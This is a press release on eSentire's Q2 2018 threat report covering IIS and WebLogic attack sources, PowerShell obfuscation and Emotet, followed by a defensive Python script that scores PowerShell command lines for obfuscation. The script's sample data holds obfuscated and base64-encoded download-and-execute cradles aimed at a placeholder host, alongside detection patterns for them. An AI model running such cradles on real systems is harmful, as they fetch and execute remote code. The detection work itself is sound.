eSentire Threat Intelligence's analysis of the attacks found that both the IIS and the WebLogic exploit campaigns maintained a consistent volume (about 200 attacks) per source IP across organizations, and that the attacking IPs were themselves servers hosting Apache, RDP, SQL, IIS, and HTTP API services.
Most sources targeting IIS web servers were China-based IP addresses. According to Shodan, 3.5 million IIS web servers are exposed to the internet, 1 million of them in China. The compromised servers used as attack sources were largely hosted on Tencent and Alibaba infrastructure.
eSentire also noted an interesting collection of operating systems among the attacking infrastructure involved – over 400 of the attacking IPs had Shodan records indicating they were Windows machines (including XP, 7, 8, 2008, and 2012). Additionally, nearly 350 FTP servers and over 100 mail servers were reported; there were also VPN servers, MikroTik devices (reported as bandwidth-testing servers), Kangle, Squid, Jetty, and a handful of lesser-known web service technologies.
“IIS is a popular web server, with prevalence in the U.S. and China. Organizations using web servers need to make sure they monitor for these vulnerabilities and update or patch as necessary. Oracle WebLogic is another web server that saw a lot of attacks and we’ve seen Apache attacks reported too,” said Kerry Bailey, CEO, eSentire. “Web servers are exposed de facto, which makes them a primary target, and we saw continued attacks against IIS in Q3 2018. IIS patches for earlier versions, like 6.0, are available. Otherwise, users should consider updating to more recent versions of the web server.”
Additional Q2 2018 report findings:
· Top five most affected industries: biotechnology, accounting, real estate, marketing, and construction.
· The most common execution technique observed at endpoints was PowerShell (32%), followed by VBA scripting (21%). Of the PowerShell-based attacks observed, 83% used obfuscated command lines intended to hide their purpose.
· Emotet was the most frequently observed malware, due to numerous version updates and feature additions since it was first reported in 2014.
· The use of obfuscated PowerShell commands increased 50% from the previous quarter, partly due to Emotet.
· Four exploit campaigns stood out, targeting IIS, Drupal, and WebLogic servers and GPON home routers. GPON routers were attacked after proof-of-concept exploit code was released (eSentire saw about 5,000 detections in total, with volume peaking on May 12), and home-router exploitation continued into Q3.
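The findings above count PowerShell executions whose command lines were obfuscated, but the report does not say how it classified them. The following is an added example, not code from eSentire or the report: a small Python triage script that scores process-creation command lines for the common obfuscation and living-off-the-land indicators behind such a statistic (an -EncodedCommand blob, hidden window and no-profile switches, backtick or caret character splitting, string concatenation, and download cradles), decodes the UTF-16LE base64 payload and scores it too. The sample events, the indicator list, the weights and the threshold are all this example's own assumptions, not eSentire's detection logic.

```python
import base64
import re
from typing import List, Optional, Tuple


def _utf16_b64(text: str) -> str:
    """Encode text the way powershell.exe expects for -EncodedCommand (UTF-16LE, then base64)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation events (image, command line). These are illustrative,
# not telemetry from the report; the encoded one is built from a plain-text download cradle.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"

SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("powershell.exe", r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
    ("powershell.exe", "powershell.exe -nop -w hidden -enc " + _utf16_b64(CRADLE)),
    ("powershell.exe", 'powershell.exe -w hidden -c "I`E`X (New-Object Net.WebClient)'
                       '.DownloadString(\'http://example.invalid/b\')"'),
    ("powershell.exe", 'powershell.exe -nop -c "$u=\'http://example.invalid/c\';$w=New-Object Net.WebClient;'
                       '$d=$w.(\'Down\'+\'loadString\').Invoke($u);Invoke-Expression $d"'),
    ("powershell.exe", 'powershell.exe -Command "Get-Service -Name Spooler | Select-Object Status"'),
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob; the prefix is validated in code
# so that e.g. "-ExecutionPolicy Bypass" is not mistaken for an encoded command.
ENCODED_ARG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)

# (flag name, pattern, weight). Weights are an assumption of this example, not a published model.
INDICATORS = [
    ("hidden_window",      re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 1),
    ("no_profile",         re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("non_interactive",    re.compile(r"-noni(?:nteractive)?\b", re.I), 1),
    ("bypass_policy",      re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I), 1),
    ("invoke_expression",  re.compile(r"\biex\b|invoke-expression", re.I), 2),
    ("download_cradle",    re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I), 2),
    ("from_base64",        re.compile(r"frombase64string", re.I), 2),
    ("char_casting",       re.compile(r"\[char\]\s*\d+", re.I), 2),
    ("string_joining",     re.compile(r"-join\b|\.replace\(|'\s*\+\s*'", re.I), 2),
    ("backtick_splitting", re.compile(r"[A-Za-z]`[A-Za-z]"), 3),
    ("caret_splitting",    re.compile(r"[A-Za-z]\^[A-Za-z]"), 3),
]


def decode_encoded_command(blob: str) -> Optional[str]:
    """Return the script behind an -EncodedCommand blob, or None if it is not valid UTF-16LE text."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def score_command_line(cmdline: str, depth: int = 0) -> Tuple[int, List[str]]:
    """Score one command line; the decoded payload of an encoded command is scored recursively."""
    score, flags, text = 0, [], cmdline
    m = ENCODED_ARG.search(text)
    if m:
        param, blob = m.group(1).lower(), m.group(2)
        if param == "ec" or "encodedcommand".startswith(param):
            decoded = decode_encoded_command(blob)
            if decoded is not None:
                score += 3
                flags.append("encoded_command")
                # Drop the blob so base64 fragments cannot trigger keyword patterns below.
                text = text[:m.start(2)] + "<blob>" + text[m.end(2):]
                if depth < 2:
                    inner_score, inner_flags = score_command_line(decoded, depth + 1)
                    score += inner_score
                    flags.extend("decoded:" + f for f in inner_flags)
    # Keyword patterns are also run on a view with backticks and carets stripped, so that
    # I`E`X still counts as Invoke-Expression on top of the splitting itself being flagged.
    normalized = text.replace("`", "").replace("^", "")
    for name, pattern, weight in INDICATORS:
        if pattern.search(text) or pattern.search(normalized):
            score += weight
            flags.append(name)
    return score, flags


def triage(events: List[Tuple[str, str]], threshold: int = 4) -> List[Tuple[str, int, List[str]]]:
    """Return (image, score, flags) for events at or above the threshold, highest score first."""
    hits = []
    for image, cmdline in events:
        score, flags = score_command_line(cmdline)
        if score >= threshold:
            hits.append((image, score, flags))
    return sorted(hits, key=lambda h: h[1], reverse=True)


if __name__ == "__main__":
    for image, score, flags in triage(SAMPLE_EVENTS):
        print(f"{score:2d}  {image}  {', '.join(flags)}")
```

In practice the events would come from Windows Security event 4688 with command-line auditing enabled, or from Sysmon event 1, rather than from the constructed list. The weighted score matters because no single indicator is conclusive: administrators legitimately use -EncodedCommand and -ExecutionPolicy Bypass, which is why the first sample scores below the threshold while the three obfuscated ones are flagged, and why the decoded payload is scored rather than the mere presence of an encoded argument.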
The eSentire Threat Intelligence team used data gathered from 2,000+ proprietary network and host-based detection sensors distributed globally across multiple industries. Raw data was normalized and aggregated using automated machine-based processing methods. Processed data was reviewed by a visual data analyst applying quantitative analysis methods. Quantitative intelligence analysis results were further processed by a qualitative intelligence analyst resulting in a written analytical product.
eSentire’s 2018 Q2 Threat Report provides a quarterly snapshot, analyzing all cyber threat events investigated by the eSentire Security Operations Center (SOC), while addressing three key areas: threat types, threat volume, and attack types. Each topic is divided into multiple sections, including visual data analysis, written analysis, practical recommendations, and key assumptions.
To access a complete copy of the report, visit: https://www.esentire.com/resources/knowledge/q2-2018-quarterly-threat-report.
eSentire® is the largest pure-play Managed Detection and Response (MDR) service provider, keeping organizations safe from constantly evolving cyber-attacks that technology alone cannot prevent. Its 24x7 Security Operations Center (SOC), staffed by elite security analysts, hunts, investigates, and responds in real-time to known and unknown threats before they become business disrupting events. Protecting more than $5.7 trillion AUM in the financial sector alone, eSentire absorbs the complexity of cybersecurity, delivering enterprise-grade protection and the ability to comply with growing regulatory requirements. For more information, visit www.esentire.com and follow @eSentire.
Products, service names, and company logos mentioned herein may be the registered trademarks of their respective owners. All rights reserved.